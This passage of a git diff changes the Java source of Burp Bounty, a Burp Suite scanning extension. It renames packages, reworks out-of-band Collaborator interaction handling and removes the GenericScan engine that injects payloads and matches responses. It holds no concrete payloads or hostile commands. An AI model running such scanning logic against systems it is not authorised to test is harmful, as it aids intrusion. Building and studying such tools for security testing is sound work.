}//GEN-LAST:event_goWebBurp + + private void goImageWeb(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_goImageWeb + try { + Desktop.getDesktop().browse(new URI("https://burpbounty.net")); + } catch (URISyntaxException | IOException e) { + callbacks.printError("Burp Bounty Gui 4383 Help web not opened: " + e); } - }//GEN-LAST:event_jLabel3gowebBurp + }//GEN-LAST:event_goImageWeb + + // Variables declaration - do not modify//GEN-BEGIN:variables @@ -3208,16 +2075,22 @@ private void jLabel3gowebBurp(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_ private javax.swing.JButton jButton5; private javax.swing.JCheckBoxMenuItem jCheckBoxMenuItem1; private javax.swing.JLabel jLabel1; - private javax.swing.JLabel jLabel2; + private javax.swing.JLabel jLabel10; + private javax.swing.JLabel jLabel12; + private javax.swing.JLabel jLabel22; + public javax.swing.JLabel jLabel23; + private javax.swing.JLabel jLabel24; private javax.swing.JLabel jLabel3; private javax.swing.JLabel jLabel43; private javax.swing.JLabel jLabel44; private javax.swing.JLabel jLabel45; private javax.swing.JLabel jLabel48; private javax.swing.JLabel jLabel49; + private javax.swing.JLabel jLabel5; private javax.swing.JLabel jLabel50; private javax.swing.JLabel jLabel51; - private javax.swing.JLabel jLabel53; + private javax.swing.JLabel jLabel57; + private javax.swing.JLabel jLabel58; private javax.swing.JLabel jLabel6; private javax.swing.JLabel jLabel7; private javax.swing.JMenuItem jMenuItem1; @@ -3227,7 +2100,10 @@ private void jLabel3gowebBurp(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_ private javax.swing.JMenuItem jMenuItem5; private javax.swing.JMenuItem jMenuItem6; private javax.swing.JMenuItem jMenuItem7; + private javax.swing.JMenuItem jMenuItem8; + private javax.swing.JMenuItem jMenuItem9; public javax.swing.JPanel jPanel1; + private javax.swing.JPanel jPanel10; private javax.swing.JPanel jPanel3; public javax.swing.JPanel jPanel4; private javax.swing.JPanel jPanel5; @@ -3237,11 +2113,13 @@ private void jLabel3gowebBurp(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_ private javax.swing.JPopupMenu jPopupMenu1; private javax.swing.JPopupMenu jPopupMenu2; private javax.swing.JPopupMenu jPopupMenu3; + private javax.swing.JPopupMenu jPopupMenu4; private javax.swing.JScrollPane jScrollPane10; private javax.swing.JScrollPane jScrollPane13; private javax.swing.JScrollPane jScrollPane5; private javax.swing.JScrollPane jScrollPane6; private javax.swing.JSeparator jSeparator13; + private javax.swing.JSplitPane jSplitPane1; public javax.swing.JTabbedPane jTabbedPane2; private javax.swing.JTabbedPane jtabpane; public javax.swing.JList listtagmanager; @@ -3251,4 +2129,5 @@ private void jLabel3gowebBurp(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_ private javax.swing.JTable table3; public javax.swing.JTextField text11; // End of variables declaration//GEN-END:variables + } diff --git a/src/BurpCollaboratorThread.java b/src/BurpCollaboratorThread.java index 68734f4..992a857 100755 --- a/src/BurpCollaboratorThread.java +++ b/src/BurpCollaboratorThread.java @@ -13,7 +13,7 @@ See the License for the specific language governing permissions and limitations under the License. */ -package burpbounty; +package burpbountyfree; import burp.IBurpCollaboratorClientContext; import burp.IBurpCollaboratorInteraction; @@ -43,7 +43,8 @@ public class BurpCollaboratorThread extends Thread { private String issueconfidence; CollaboratorData burpCollaboratorData; - public BurpCollaboratorThread(IBurpExtenderCallbacks callbacks, CollaboratorData burpCollaboratorData) { + public BurpCollaboratorThread(IBurpExtenderCallbacks callbacks, CollaboratorData burpCollaboratorData) + { this.callbacks = callbacks; helpers = callbacks.getHelpers(); this.burpCollaboratorData = burpCollaboratorData; @@ -59,6 +60,9 @@ public BurpCollaboratorThread(IBurpExtenderCallbacks callbacks, CollaboratorData remediationbackground = ""; issueseverity = ""; issueconfidence = ""; + this.callbacks = callbacks; + helpers = callbacks.getHelpers(); + this.burpCollaboratorData = burpCollaboratorData; } @@ -87,6 +91,8 @@ public void run() { BurpCollaboratorThread.sleep(10000); } catch (NullPointerException | InterruptedException e) { System.out.println("Thread error: " + e); + } catch (IllegalStateException ex) { + this.doStop(); } } } @@ -98,7 +104,31 @@ public void addIssue(IBurpCollaboratorClientContext cc, IBurpCollaboratorInterac String client_ip = interactions.getProperty("client_ip"); String time_stamp = interactions.getProperty("time_stamp"); String query_type = interactions.getProperty("query_type"); + + try { + if (type.equals("DNS")) { + String raw_query = interactions.getProperty("raw_query"); + if (raw_query != null) { + String query = new String(helpers.base64Decode(raw_query)); + String subdomain = query.split("7")[1]; + subdomain = "7"+subdomain+"7"; + bchost = subdomain + "." + bchost; + } + } else if (type.equals("HTTP")) { + String query = interactions.getProperty("request"); + String request = new String(helpers.base64Decode(query)); + int sub_ini = request.indexOf("Host: "); + int sub_end = request.indexOf("\r\n", sub_ini); + bchost = request.substring(sub_ini+6, sub_end); + } + } catch (Exception e) { + System.out.println("Thread2 error: " + e); + } + issueProperties = burpCollaboratorData.getIssueProperties(bchost); + if (issueProperties == null) { + return; + } issuename = issueProperties.getProperty("issuename"); issuedetail = issueProperties.getProperty("issuedetail"); issuebackground = issueProperties.getProperty("issuebackground"); @@ -109,9 +139,9 @@ public void addIssue(IBurpCollaboratorClientContext cc, IBurpCollaboratorInterac issuedetail = issuedetail + "

BurpCollaborator data:

Interaction id: " + interaction_id + "
type: " + type + "
client_ip: " + client_ip + "
time_stamp: " + time_stamp + "
query_type: " + query_type + "
"; - IHttpRequestResponse requestResponse = burpCollaboratorData.getRequestResponse(bchost); List requestMarkers = new ArrayList(); int start = 0; + IHttpRequestResponse requestResponse = burpCollaboratorData.getRequestResponse(bchost); byte[] match = helpers.stringToBytes(bchost); byte[] request = requestResponse.getRequest(); @@ -123,10 +153,10 @@ public void addIssue(IBurpCollaboratorClientContext cc, IBurpCollaboratorInterac requestMarkers.add(new int[]{start, start + match.length}); start += match.length; } + callbacks.addScanIssue(new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(), new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, requestMarkers, null)}, "BurpBounty - " + issuename, issuedetail, issueseverity, issueconfidence, remediationdetail, issuebackground, remediationbackground)); - } } diff --git a/src/BurpExtender.java b/src/BurpExtender.java deleted file mode 100755 index 806adf5..0000000 --- a/src/BurpExtender.java +++ /dev/null @@ -1,7 +0,0 @@ -package burp; - -import burpbounty.BurpBountyExtension; - -public class BurpExtender extends BurpBountyExtension { - -} \ No newline at end of file diff --git a/src/CollaboratorData.java b/src/CollaboratorData.java index cf4cd73..92ef00f 100755 --- a/src/CollaboratorData.java +++ b/src/CollaboratorData.java @@ -13,7 +13,7 @@ See the License for the specific language governing permissions and limitations under the License. */ -package burpbounty; +package burpbountyfree; import burp.IBurpCollaboratorClientContext; import burp.IExtensionHelpers; diff --git a/src/CustomScanIssue.java b/src/CustomScanIssue.java index f093429..fb02cfb 100755 --- a/src/CustomScanIssue.java +++ b/src/CustomScanIssue.java @@ -13,7 +13,7 @@ See the License for the specific language governing permissions and limitations under the License. */ -package burpbounty; +package burpbountyfree; import burp.IHttpRequestResponse; import burp.IHttpService; @@ -69,7 +69,7 @@ public String getIssueName() { @Override public int getIssueType() { - return 0; + return 0x08000000; } @Override @@ -111,5 +111,4 @@ public IHttpRequestResponse[] getHttpMessages() { public IHttpService getHttpService() { return httpService; } - } diff --git a/src/GenericScan.java b/src/GenericScan.java deleted file mode 100755 index b0daa4d..0000000 --- a/src/GenericScan.java +++ /dev/null @@ -1,980 +0,0 @@ -/* -Copyright 2018 Eduardo Garcia Melia - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. - */ -package burpbounty; - -import burp.IBurpExtenderCallbacks; -import burp.IExtensionHelpers; -import burp.IHttpRequestResponse; -import burp.IHttpService; -import burp.IRequestInfo; -import burp.IResponseInfo; -import burp.IResponseVariations; -import burp.IScanIssue; -import burp.IScannerInsertionPoint; -import com.google.gson.Gson; -import com.google.gson.JsonArray; -import java.util.ArrayList; -import java.util.Arrays; -import java.util.List; -import java.net.MalformedURLException; -import java.net.URL; - -public class GenericScan { - - private IBurpExtenderCallbacks callbacks; - private IExtensionHelpers helpers; - String issuename; - String issuedetail; - String issuebackground; - String remediationdetail; - String remediationbackground; - String charstourlencode; - int scanner; - int matchtype; - String issueseverity; - String issueconfidence; - boolean excludeHTTP; - boolean onlyHTTP; - boolean notresponse; - boolean iscontenttype; - boolean isresponsecode; - boolean negativect; - boolean negativerc; - String contenttype; - String responsecode; - boolean casesensitive; - boolean urlencode; - Integer maxredirect; - Integer redirtype; - int payloadposition; - String timeout; - String contentLength; - List payloads; - List payloadsEncoded; - List payloadsenc; - List greps; - List encoders; - JsonArray data; - Gson gson; - ProfilesProperties profile_property; - List headers; - CollaboratorData burpCollaboratorData; - List variationAttributes; - List insertionPointType; - Boolean pathDiscovery; - String filename; - JsonArray allprofiles; - JsonArray active_profiles; - BurpBountyExtension bbe; - - public GenericScan(BurpBountyExtension bbe, IBurpExtenderCallbacks callbacks, CollaboratorData burpCollaboratorData, String filename, JsonArray allprofiles) { - - this.callbacks = callbacks; - helpers = callbacks.getHelpers(); - this.burpCollaboratorData = burpCollaboratorData; - gson = new Gson(); - this.filename = filename; - this.allprofiles = allprofiles; - this.bbe = bbe; - } - - public List runAScan(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint, JsonArray activeprofiles, String bchost) { - - if (helpers.analyzeResponse(baseRequestResponse.getResponse()) == null | helpers.analyzeRequest(baseRequestResponse.getRequest()) == null) { - return null; - } - - List issues = new ArrayList<>(); - IHttpService httpService = baseRequestResponse.getHttpService(); - List responseCodes = new ArrayList<>(Arrays.asList(300, 301, 303, 302, 307, 308)); - int limitredirect = 30; - - for (int i = 0; i < activeprofiles.size(); i++) { - Object idata = activeprofiles.get(i); - profile_property = gson.fromJson(idata.toString(), ProfilesProperties.class); - - payloads = profile_property.getPayloads(); - greps = profile_property.getGreps(); - issuename = profile_property.getIssueName(); - issueseverity = profile_property.getIssueSeverity(); - issueconfidence = profile_property.getIssueConfidence(); - issuedetail = profile_property.getIssueDetail(); - issuebackground = profile_property.getIssueBackground(); - remediationdetail = profile_property.getRemediationDetail(); - remediationbackground = profile_property.getRemediationBackground(); - matchtype = profile_property.getMatchType(); - notresponse = profile_property.getNotResponse(); - casesensitive = profile_property.getCaseSensitive(); - encoders = profile_property.getEncoder(); - urlencode = profile_property.getUrlEncode(); - charstourlencode = profile_property.getCharsToUrlEncode(); - iscontenttype = profile_property.getIsContentType(); - isresponsecode = profile_property.getIsResponseCode(); - contenttype = profile_property.getContentType(); - responsecode = profile_property.getResponseCode(); - excludeHTTP = profile_property.getExcludeHTTP(); - onlyHTTP = profile_property.getOnlyHTTP(); - negativect = profile_property.getNegativeCT(); - negativerc = profile_property.getNegativeRC(); - maxredirect = profile_property.getMaxRedir(); - redirtype = profile_property.getRedirection(); - payloadposition = profile_property.getPayloadPosition(); - timeout = profile_property.getTime(); - contentLength = profile_property.getContentLength(); - headers = profile_property.getHeader() != null ? profile_property.getHeader() : new ArrayList(); - variationAttributes = profile_property.getVariationAttributes() != null ? profile_property.getVariationAttributes() : new ArrayList(); - insertionPointType = profile_property.getInsertionPointType() != null ? profile_property.getInsertionPointType() : new ArrayList(Arrays.asList(0)); - pathDiscovery = profile_property.getPathDiscover(); - - IScanIssue matches = null; - GrepMatch gm = new GrepMatch(callbacks); - - //If encoders exist... - if (!encoders.isEmpty()) { - switch (matchtype) { - case 1: - payloadsEncoded = processPayload(payloads, encoders); - payloads = new ArrayList(payloadsEncoded); - break; - case 2: - payloadsEncoded = processPayload(payloads, encoders); - payloads = new ArrayList(payloadsEncoded); - break; - case 3: - payloadsEncoded = processPayload(payloads, encoders); - greps = new ArrayList(); - for (String p : payloads) { - greps.add("true,Or," + p); - } - payloads = payloadsEncoded; - break; - case 4: - greps = new ArrayList(); - payloadsEncoded = processPayload(payloads, encoders); - for (String p : payloads) { - greps.add("true,Or," + p); - } - payloads = new ArrayList(payloadsEncoded); - break; - default: - payloadsEncoded = processPayload(payloads, encoders); - payloads = new ArrayList(payloadsEncoded); - break; - } - - } else { - if (matchtype == 3) { - for (String p : payloads) { - greps.add("true,Or," + p); - } - } - } - - for (String payload : payloads) { - - if (urlencode) { - payload = encodeTheseURL(payload, charstourlencode); - } - - if (payloadposition == 2) { - String value = insertionPoint.getBaseValue(); - payload = value.concat(payload); - } - - if (!headers.isEmpty()) { - for (int x = 0; x < headers.size(); x++) { - if (headers.get(x).type.equals("Payload")) { - if (headers.get(x).regex.equals("String")) { - payload = payload.replace(headers.get(x).match, headers.get(x).replace); - } else { - payload = payload.replaceAll(headers.get(x).match, headers.get(x).replace); - } - } - } - } - - if (payload.contains(" ")) {//for avoid space in payload - payload = payload.replace(" ", "%20"); - } - - if (matchtype == 5) {//no cambiar a switch - long startTime, endTime, difference; - matches = null; - IHttpRequestResponse requestResponse; - Integer responseCode; - Integer responseCodeBase; - IResponseInfo r; - IResponseInfo rbase; - - try { - startTime = System.currentTimeMillis(); - requestResponse = callbacks.makeHttpRequest(httpService, new BuildUnencodeRequest(helpers).buildUnencodedRequest(insertionPoint, helpers.stringToBytes(payload), headers, bchost)); - endTime = System.currentTimeMillis(); - difference = (endTime - startTime); - } catch (Exception ex) { - break; - } - - r = helpers.analyzeResponse(requestResponse.getResponse()); - rbase = helpers.analyzeResponse(baseRequestResponse.getResponse()); - - responseCode = new Integer(r.getStatusCode()); - responseCodeBase = new Integer(rbase.getStatusCode()); - - if ((!isresponsecode || isresponsecode && isResponseCode(responsecode, negativerc, responseCode) && isResponseCode(responsecode, negativerc, responseCodeBase)) && (!iscontenttype || iscontenttype && isContentType(contenttype, negativect, r))) { - Integer time = Integer.parseInt(timeout); - if (difference >= time * 1000) { - matches = new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(), - new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, null, null)}, - "BurpBounty - " + issuename, issuedetail.replace("", helpers.urlEncode(payload)), issueseverity, - issueconfidence, remediationdetail.replace("", helpers.urlEncode(payload)), issuebackground.replace("", helpers.urlEncode(payload)), - remediationbackground.replace("", helpers.urlEncode(payload))); - } - } - - try { - if (matches != null) { - issues.add(matches); - break; - } - } catch (Exception e) { - continue; - } - } else if (matchtype == 7 || matchtype == 8)//Variations match type//Invariation match type - { - IHttpRequestResponse requestResponse; - matches = null; - Integer responseCode; - IResponseInfo r; - - try { - requestResponse = callbacks.makeHttpRequest(httpService, new BuildUnencodeRequest(helpers).buildUnencodedRequest(insertionPoint, helpers.stringToBytes(payload), headers, bchost)); - } catch (Exception ex) { - break; - } - - IResponseVariations ipv = helpers.analyzeResponseVariations(baseRequestResponse.getResponse(), requestResponse.getResponse()); - List var; - - if (matchtype == 7) { - var = ipv.getVariantAttributes(); - } else { - var = ipv.getInvariantAttributes(); - } - - List requestMarkers = new ArrayList(); - byte[] request = requestResponse.getRequest(); - r = helpers.analyzeResponse(requestResponse.getResponse()); - responseCode = new Integer(r.getStatusCode()); - - if ((!isresponsecode || isresponsecode && isResponseCode(responsecode, negativerc, responseCode)) && (!iscontenttype || iscontenttype && isContentType(contenttype, negativect, r))) { - if (var.containsAll(variationAttributes)) { - int start = 0; - byte[] match = helpers.stringToBytes(payload); - while (start < request.length) { - start = helpers.indexOf(request, match, false, start, request.length); - if (start == -1) { - break; - } - requestMarkers.add(new int[]{start, start + match.length}); - start += match.length; - } - - matches = new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(), - new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, requestMarkers, null)}, - "BurpBounty - " + issuename, issuedetail.replace("", helpers.urlEncode(payload)), issueseverity, - issueconfidence, remediationdetail.replace("", helpers.urlEncode(payload)), issuebackground.replace("", helpers.urlEncode(payload)), - remediationbackground.replace("", helpers.urlEncode(payload))); - } - } - try { - if (matches != null) { - issues.add(matches); - break; - } - } catch (Exception e) { - continue; - } - } else if (matchtype == 6)//Content Length difference match type - { - IHttpRequestResponse requestResponse; - matches = null; - Integer responseCode; - Integer responseCodeBase; - IResponseInfo r; - IResponseInfo rbase; - - try { - requestResponse = callbacks.makeHttpRequest(httpService, new BuildUnencodeRequest(helpers).buildUnencodedRequest(insertionPoint, helpers.stringToBytes(payload), headers, bchost)); - r = helpers.analyzeResponse(requestResponse.getResponse()); - rbase = helpers.analyzeResponse(baseRequestResponse.getResponse()); - } catch (Exception ex) { - break; - } - - responseCode = new Integer(r.getStatusCode()); - responseCodeBase = new Integer(rbase.getStatusCode()); - - if ((!isresponsecode || isresponsecode && isResponseCode(responsecode, negativerc, responseCode) && isResponseCode(responsecode, negativerc, responseCodeBase)) && (!iscontenttype || iscontenttype && isContentType(contenttype, negativect, r))) { - int baseResponseContentLength = getContentLength(baseRequestResponse); - int currentResponseContentLength = getContentLength(requestResponse); - - if (Math.abs(baseResponseContentLength - currentResponseContentLength) > Integer.parseInt(contentLength)) { - List responseMarkers = new ArrayList(1); - String grep = "CONTENT-LENGTH:"; - responseMarkers.add(new int[]{helpers.bytesToString(requestResponse.getResponse()).toUpperCase().indexOf(grep), - helpers.bytesToString(requestResponse.getResponse()).toUpperCase().indexOf(grep) + grep.length()}); - - matches = new CustomScanIssue(requestResponse.getHttpService(), helpers.analyzeRequest(requestResponse).getUrl(), - new IHttpRequestResponse[]{callbacks.applyMarkers(requestResponse, null, responseMarkers)}, - "BurpBounty - " + issuename, issuedetail.replace("", helpers.urlEncode(payload)).replace("", helpers.urlEncode(grep)), issueseverity, - issueconfidence, remediationdetail.replace("", helpers.urlEncode(payload)).replace("", helpers.urlEncode(grep)), issuebackground.replace("", helpers.urlEncode(payload)).replace("", helpers.urlEncode(grep)), - remediationbackground.replace("", helpers.urlEncode(payload)).replace("", helpers.urlEncode(grep))); - } - } - try { - if (matches != null) { - issues.add(matches); - break; - } - } catch (Exception e) { - continue; - } - } else {//String, Regex, Payload, Payload without encode match types - - if (payload.contains("{BC}")) { - - IHttpRequestResponse requestResponse; - IResponseInfo r; - Integer responseCode; - int loop = 0; - Boolean redirect = true; - URL url; - - payload = payload.replace("{BC}", bchost); - - try { - requestResponse = callbacks.makeHttpRequest(httpService, new BuildUnencodeRequest(helpers).buildUnencodedRequest(insertionPoint, helpers.stringToBytes(payload), headers, bchost)); - r = helpers.analyzeResponse(requestResponse.getResponse()); - } catch (Exception ex) { - callbacks.printError("GenericScan line 371: " + ex.getMessage()); - break; - } - - responseCode = new Integer(r.getStatusCode()); - - burpCollaboratorData.setIssueProperties(requestResponse, bchost, issuename, issuedetail.replace("", helpers.urlEncode(payload)), issueseverity, issueconfidence, remediationdetail.replace("", helpers.urlEncode(payload)), issuebackground.replace("", helpers.urlEncode(payload)), remediationbackground.replace("", helpers.urlEncode(payload))); - - do { - if (responseCodes.contains(responseCode) && loop < limitredirect) { - httpService = requestResponse.getHttpService(); - url = getRedirection(requestResponse, httpService); - - if (url != null) { - byte[] checkRequest = helpers.buildHttpRequest(url); - checkRequest = getMatchAndReplace(headers, checkRequest, payload, bchost); - int port = 0; - if (url.getPort() == -1) { - port = url.getDefaultPort(); - } - IHttpService newrequest = helpers.buildHttpService(url.getHost(), port, url.getProtocol()); - requestResponse = callbacks.makeHttpRequest(newrequest, checkRequest); - IHttpRequestResponse redirectRequestResponse = requestResponse; - r = helpers.analyzeResponse(redirectRequestResponse.getResponse()); - responseCode = new Integer(r.getStatusCode()); - } - loop += 1; - } else { - redirect = false; - } - } while (redirect); - - } else { - IHttpRequestResponse requestResponse; - IResponseInfo r; - Integer responseCode; - int loop = 0; - URL url; - Boolean redirect = true; - - //multiarray - int grep_index = 0; - ArrayList> greps_final = new ArrayList<>(greps.size()); - for (int index = 0; index < greps.size(); index++) { - greps_final.add(new ArrayList()); - } - - for (String grep : greps) { - String[] tokens = grep.split(",", 3); - if (tokens[0].equals("true")) { - if (tokens[1].equals("Or")) { - if (!tokens[2].equals("")) { - greps_final.get(grep_index).add(tokens[2]); - grep_index = grep_index + 1; - } - } - } - } - - try { - requestResponse = callbacks.makeHttpRequest(httpService, new BuildUnencodeRequest(helpers).buildUnencodedRequest(insertionPoint, helpers.stringToBytes(payload), headers, bchost)); - IHttpRequestResponse redirectRequestResponse = requestResponse; - r = helpers.analyzeResponse(redirectRequestResponse.getResponse()); - } catch (NullPointerException e) { - break; - } - - responseCode = new Integer(r.getStatusCode()); - - if ((!isresponsecode || isresponsecode && isResponseCode(responsecode, negativerc, responseCode)) && (!iscontenttype || iscontenttype && isContentType(contenttype, negativect, r))) { - for (int x = 0; x < grep_index; x++) { - if (!greps_final.get(x).isEmpty()) { - matches = gm.getResponseMatches(requestResponse, payload, greps_final.get(x), issuename, issuedetail, issuebackground, remediationdetail, remediationbackground, charstourlencode, matchtype, - issueseverity, issueconfidence, notresponse, casesensitive, urlencode, excludeHTTP, onlyHTTP); - - try { - if (matches != null) { - issues.add(matches); - break; - } - } catch (Exception e) { - continue; - } - } - - } - } - - do { - if (responseCodes.contains(responseCode) && redirtype != 1 && loop < maxredirect && maxredirect < limitredirect) { - httpService = requestResponse.getHttpService(); - url = getRedirection(requestResponse, httpService); - - if (url != null) { - byte[] checkRequest = helpers.buildHttpRequest(url); - checkRequest = getMatchAndReplace(headers, checkRequest, payload, bchost); - int port = 0; - if (url.getPort() == -1) { - port = url.getDefaultPort(); - } - IHttpService newrequest = helpers.buildHttpService(url.getHost(), port, url.getProtocol()); - requestResponse = callbacks.makeHttpRequest(newrequest, checkRequest); - IHttpRequestResponse redirectRequestResponse = requestResponse; - r = helpers.analyzeResponse(redirectRequestResponse.getResponse()); - responseCode = new Integer(r.getStatusCode()); - - if ((!isresponsecode || isresponsecode && isResponseCode(responsecode, negativerc, responseCode)) && (!iscontenttype || iscontenttype && isContentType(contenttype, negativect, r))) { - for (int x = 0; x < grep_index; x++) { - if (!greps_final.get(x).isEmpty()) { - matches = gm.getResponseMatches(requestResponse, payload, greps_final.get(x), issuename, issuedetail, issuebackground, remediationdetail, remediationbackground, charstourlencode, matchtype, - issueseverity, issueconfidence, notresponse, casesensitive, urlencode, excludeHTTP, onlyHTTP); - - try { - if (matches != null) { - issues.add(matches); - break; - } - } catch (Exception e) { - continue; - } - } - } - } - - } else { - redirect = false; - } - - } else { - redirect = false; - } - loop += 1; - - } while (redirect); - } - } - } - } - - return issues; - } - - public List runResPScan(IHttpRequestResponse baseRequestResponse, JsonArray passiveresprofiles, String bchost) throws Exception { - - List issues = new ArrayList<>(); - - for (int i = 0; i < passiveresprofiles.size(); i++) { - Object idata = passiveresprofiles.get(i); - profile_property = gson.fromJson(idata.toString(), ProfilesProperties.class); - greps = profile_property.getGreps(); - issuename = profile_property.getIssueName(); - issueseverity = profile_property.getIssueSeverity(); - issueconfidence = profile_property.getIssueConfidence(); - issuedetail = profile_property.getIssueDetail(); - issuebackground = profile_property.getIssueBackground(); - remediationdetail = profile_property.getRemediationDetail(); - remediationbackground = profile_property.getRemediationBackground(); - matchtype = profile_property.getMatchType(); - notresponse = profile_property.getNotResponse(); - casesensitive = profile_property.getCaseSensitive(); - iscontenttype = profile_property.getIsContentType(); - isresponsecode = profile_property.getIsResponseCode(); - contenttype = profile_property.getContentType(); - responsecode = profile_property.getResponseCode(); - excludeHTTP = profile_property.getExcludeHTTP(); - onlyHTTP = profile_property.getOnlyHTTP(); - negativect = profile_property.getNegativeCT(); - negativerc = profile_property.getNegativeRC(); - scanner = profile_property.getScanner(); - IResponseInfo r; - GrepMatch gm = new GrepMatch(callbacks); - IScanIssue matches = null; - int grep_index = 0; - ArrayList> greps_final = new ArrayList<>(greps.size()); - - if (baseRequestResponse == null) { - break; - } - - try { - r = helpers.analyzeResponse(baseRequestResponse.getResponse()); - } catch (NullPointerException e) { - break; - } - - //multiarray - for (int index = 0; index < greps.size(); index++) { - greps_final.add(new ArrayList()); - } - Integer responseCode = new Integer(r.getStatusCode()); - - for (String grep : greps) { - if ((isresponsecode && !isResponseCode(responsecode, negativerc, responseCode)) || (iscontenttype && !isContentType(contenttype, negativect, r))) { - break; - } - - String[] tokens = grep.split(",", 3); - - if (tokens.length > 1) { - if (tokens[0].equals("true")) { - if (tokens[1].equals("Or")) { - if (!tokens[2].equals("")) { - greps_final.get(grep_index).add(tokens[2]); - grep_index = grep_index + 1; - } - } - } - } else { - if (!tokens[0].equals("")) { - greps_final.get(grep_index).add(tokens[0]); - grep_index = grep_index + 1; - } - } - } - - for (int x = 0; x < grep_index; x++) { - if (!greps_final.get(x).isEmpty()) { - matches = gm.getResponseMatches(baseRequestResponse, "", greps_final.get(x), issuename, issuedetail.replace("", helpers.urlEncode(greps_final.get(x).toString())), issuebackground.replace("", helpers.urlEncode(greps_final.get(x).toString())), remediationdetail.replace("", helpers.urlEncode(greps_final.get(x).toString())), remediationbackground.replace("", helpers.urlEncode(greps_final.get(x).toString())), "", matchtype, - issueseverity, issueconfidence, notresponse, casesensitive, false, excludeHTTP, onlyHTTP); - } - - try { - if (matches != null) { - issues.add(matches); - break; - } - } catch (Exception e) { - continue; - } - } - } - return issues; - } - - public List runReqPScan(IHttpRequestResponse baseRequestResponse, JsonArray passivereqprofiles, String bchost) throws Exception { - - List issues = new ArrayList<>(); - Object[] matches = null; - - for (int i = 0; i < passivereqprofiles.size(); i++) { - Object idata = passivereqprofiles.get(i); - profile_property = gson.fromJson(idata.toString(), ProfilesProperties.class); - greps = profile_property.getGreps(); - issuename = profile_property.getIssueName(); - issueseverity = profile_property.getIssueSeverity(); - issueconfidence = profile_property.getIssueConfidence(); - issuedetail = profile_property.getIssueDetail(); - issuebackground = profile_property.getIssueBackground(); - remediationdetail = profile_property.getRemediationDetail(); - remediationbackground = profile_property.getRemediationBackground(); - matchtype = profile_property.getMatchType(); - notresponse = profile_property.getNotResponse(); - casesensitive = profile_property.getCaseSensitive(); - scanner = profile_property.getScanner(); - - int grep_index = 0; - ArrayList> greps_final = new ArrayList<>(greps.size()); - GrepMatch gm = new GrepMatch(callbacks); - - if (baseRequestResponse.getRequest() == null) { - break; - } - - //multiarray - for (int index = 0; index < greps.size(); index++) { - greps_final.add(new ArrayList()); - } - - for (String grep : greps) { - - String[] tokens = grep.split(",", 5); - - if (tokens.length > 1) { - if (tokens[0].equals("true")) { - if (tokens[1].equals("Or")) { - if (!tokens[4].equals("")) { - greps_final.get(grep_index).add(tokens[2] + "," + tokens[4]); - grep_index = grep_index + 1; - } - } - } - } else { - if (!tokens[0].equals("")) { - greps_final.get(grep_index).add("All Request" + "," + tokens[0]); - grep_index = grep_index + 1; - } - } - } - - for (int x = 0; x < grep_index; x++) { - if (!greps_final.get(x).isEmpty()) { - matches = gm.getRequestMatches(baseRequestResponse, greps_final.get(x), issuename, issuedetail.replace("", helpers.urlEncode(greps_final.get(x).toString())), issuebackground.replace("", helpers.urlEncode(greps_final.get(x).toString())), remediationdetail.replace("", helpers.urlEncode(greps_final.get(x).toString())), remediationbackground.replace("", helpers.urlEncode(greps_final.get(x).toString())), matchtype, - issueseverity, issueconfidence, casesensitive, notresponse); - - try { - if (matches[0] != null) { - issues.add((IScanIssue) matches[0]); - break; - } - } catch (Exception e) { - continue; - } - } - } - } - return issues; - } - - public Boolean isUrlExtension(String urlextension, boolean NegativeUrlExtension, IRequestInfo r) { - - if (urlextension.isEmpty()) { - return false; - } - - URL url = r.getUrl(); - List extensions = Arrays.asList(urlextension.toLowerCase().split(",")); - String uri = url.getPath().toLowerCase(); - String ext; - - if (uri.contains(".")) { - ext = uri.substring(uri.lastIndexOf(".") + 1); - } else { - return true; - } - - if (extensions.contains(ext)) { - if (!NegativeUrlExtension) { - return true; - } else { - return false; - } - } else { - if (NegativeUrlExtension) { - return true; - } else { - return false; - } - } - } - - public URL getRedirection(IHttpRequestResponse response, IHttpService httpService) { - - try { - URL url = getLocation(httpService, response); - - if (url.toString().contains("burpcollaborator.net")) { - return url; - } else if (redirtype == 2) { - if (url.getHost().contains(httpService.getHost())) { - return url; - } - } else if (redirtype == 3) { - boolean isurl = callbacks.isInScope(url); - if (isurl) { - return url; - } - } else if (redirtype == 4) { - return url; - } else { - return null; - } - - return null; - } catch (NullPointerException | ArrayIndexOutOfBoundsException ex) { - return null; - } - } - - public URL getLocation(IHttpService httpService, IHttpRequestResponse response) { - String[] host = null; - String Location = ""; - URL url; - - try { - IResponseInfo response_info = helpers.analyzeResponse(response.getResponse()); - - for (String header : response_info.getHeaders()) { - if (header.toUpperCase().contains("LOCATION")) { - host = header.split("\\s+"); - Location = host[1]; - } - } - - if (Location.startsWith("http://") || Location.startsWith("https://")) { - url = new URL(Location); - return url; - } else if (Location.startsWith("/")) { - url = new URL(httpService.getProtocol() + "://" + httpService.getHost() + Location); - return url; - } else { - url = new URL(httpService.getProtocol() + "://" + httpService.getHost() + "/" + Location); - return url; - } - - } catch (MalformedURLException | NullPointerException | ArrayIndexOutOfBoundsException ex) { - return null; - } - } - - public byte[] getMatchAndReplace(List headers, byte[] checkRequest, String payload, String bchost) { - String tempRequest = helpers.bytesToString(checkRequest); - - if (!headers.isEmpty()) { - for (int x = 0; x < headers.size(); x++) { - String replace = headers.get(x).replace; - if (headers.get(x).type.equals("Request")) { - if (headers.get(x).regex.equals("String")) { - if (replace.contains("{PAYLOAD}")) { - replace = replace.replace("{PAYLOAD}", payload); - } - if (replace.contains("{BC}")) { - replace = replace.replace("{BC}", bchost); - } - if 